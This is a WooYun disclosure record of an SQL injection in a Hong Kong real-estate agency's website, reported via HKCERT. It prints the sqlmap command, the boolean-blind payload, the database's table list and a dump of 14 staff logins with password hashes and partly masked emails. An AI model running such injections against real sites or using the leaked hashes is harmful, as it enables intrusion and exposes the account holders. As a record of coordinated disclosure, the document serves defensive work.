当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157165

漏洞标题:富山地產Hilltopland网站存在SQL注射漏洞(管理员密码及邮箱泄露)(香港地區)

相关厂商:富山地產Hilltopland

漏洞作者: 路人甲

提交时间:2015-12-01 12:04

修复时间:2016-01-16 15:50

公开时间:2016-01-16 15:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-02: 厂商已经确认,细节仅向厂商公开
2015-12-12: 细节向核心白帽子及相关领域专家公开
2015-12-22: 细节向普通白帽子公开
2016-01-01: 细节向实习白帽子公开
2016-01-16: 细节向公众公开

简要描述:

專營黃大仙、鑽石山、慈雲山 、彩虹、牛池灣、樂富、啟德、土瓜灣及九龍塘等地段的一、二手居屋、私人屋苑及豪宅物業買賣及租賃,並提供以上地區的樓盤資訊、成交數據、第一手地產消息、樓市指數、樓市速遞、地產法律、地產專題、凶宅、樓盤搜尋及按揭計算等服務

详细说明:

地址:http://**.**.**.**/news_daily.php?id=523

$ python sqlmap.py -u "http://**.**.**.**/news_daily.php?id=523" -p id --technique=B --random-agent --batch  --no-cast -D hilltop_hilltopland -T users-C u_Login,u_Password,u_Email --dump


Database: hilltop_hilltopland
Table: users
[14 entries]
+---------+----------------------------------+---------------------------+
| u_Login | u_Password                       | u_Email                   |
+---------+----------------------------------+---------------------------+
| admin   | e844cfd1df3bcd4ac2210630cba4ee4a | admin@admin               |
| aria    | c51e414067f68d9d122afdd032556535 | aria@**.**.**.**   |
| bd      | 7fc49895e6c0f9b45c5310aec72edb18 | bd@**.**.**.**     |
| dh      | ebde7bea3413ab685a07861c2d190f17 | dh@**.**.**.**     |
| hammer  | 0c27295c40284851ebc2e20a1167c503 | hammer@**.**.**.** |
| test    | 44d058827d19c39906fe5cdac6088593 | khlam@**.**.**.**  |
| lat     | fabae2031f4c15a13d4552e20f11d094 | lat@**.**.**.**    |
| lf      | 4a3164fe80b9ef7c08407f27941acb32 | lf@**.**.**.**     |
| ncw     | 0883540a227734ab1de0f6f17e2f42e3 | ncw@**.**.**.**    |
| rhy     | 704566fb39de3d30b8930a819cc255ce | rhy@**.**.**.**    |
| sky     | fabae2031f4c15a13d4552e20f11d094 | sky@**.**.**.**    |
| spk     | 8ab468770403fc87666eed8bd59abc7b | spk@**.**.**.**    |
| tws     | 656e9a7f25f3a93c6b7704e4c388c53a | tws@**.**.**.**    |
| wts     | 34d624ad5e2ef22e0cc65f4e36d8a16a | wts@**.**.**.**    |
+---------+----------------------------------+---------------------------+

漏洞证明:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=523 AND 8755=8755
---
web application technology: Apache
back-end DBMS: MySQL 5
available databases [2]:
[*] hilltop_hilltopland
[*] information_schema
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=523 AND 8755=8755
---
web application technology: Apache
back-end DBMS: MySQL 5
Database: hilltop_hilltopland
[28 tables]
+-----------------------+
| daily                 |
| daily_article         |
| floorplan             |
| haunted               |
| hilltop_article       |
| lam                   |
| login                 |
| main_upload           |
| memo                  |
| msm                   |
| news                  |
| pfocus_news           |
| reply_hilltop_article |
| school                |
| sms_countrycode       |
| sms_msg               |
| sms_msg_record        |
| sms_price_group_rent  |
| sms_price_group_sell  |
| subscribe             |
| test123               |
| tony_chan             |
| tran                  |
| tran_trend            |
| tvRecord              |
| upload                |
| users                 |
| week                  |
+-----------------------+


Database: hilltop_hilltopland
Table: users
[14 entries]
+---------+----------------------------------+---------------------------+
| u_Login | u_Password                       | u_Email                   |
+---------+----------------------------------+---------------------------+
| admin   | e844cfd1df3bcd4ac2210630cba4ee4a | admin@admin               |
| aria    | c51e414067f68d9d122afdd032556535 | aria@**.**.**.**   |
| bd      | 7fc49895e6c0f9b45c5310aec72edb18 | bd@**.**.**.**     |
| dh      | ebde7bea3413ab685a07861c2d190f17 | dh@**.**.**.**     |
| hammer  | 0c27295c40284851ebc2e20a1167c503 | hammer@**.**.**.** |
| test    | 44d058827d19c39906fe5cdac6088593 | khlam@**.**.**.**  |
| lat     | fabae2031f4c15a13d4552e20f11d094 | lat@**.**.**.**    |
| lf      | 4a3164fe80b9ef7c08407f27941acb32 | lf@**.**.**.**     |
| ncw     | 0883540a227734ab1de0f6f17e2f42e3 | ncw@**.**.**.**    |
| rhy     | 704566fb39de3d30b8930a819cc255ce | rhy@**.**.**.**    |
| sky     | fabae2031f4c15a13d4552e20f11d094 | sky@**.**.**.**    |
| spk     | 8ab468770403fc87666eed8bd59abc7b | spk@**.**.**.**    |
| tws     | 656e9a7f25f3a93c6b7704e4c388c53a | tws@**.**.**.**    |
| wts     | 34d624ad5e2ef22e0cc65f4e36d8a16a | wts@**.**.**.**    |
+---------+----------------------------------+---------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-12-02 15:48

厂商回复:

Referred to related parties.

最新状态:

暂无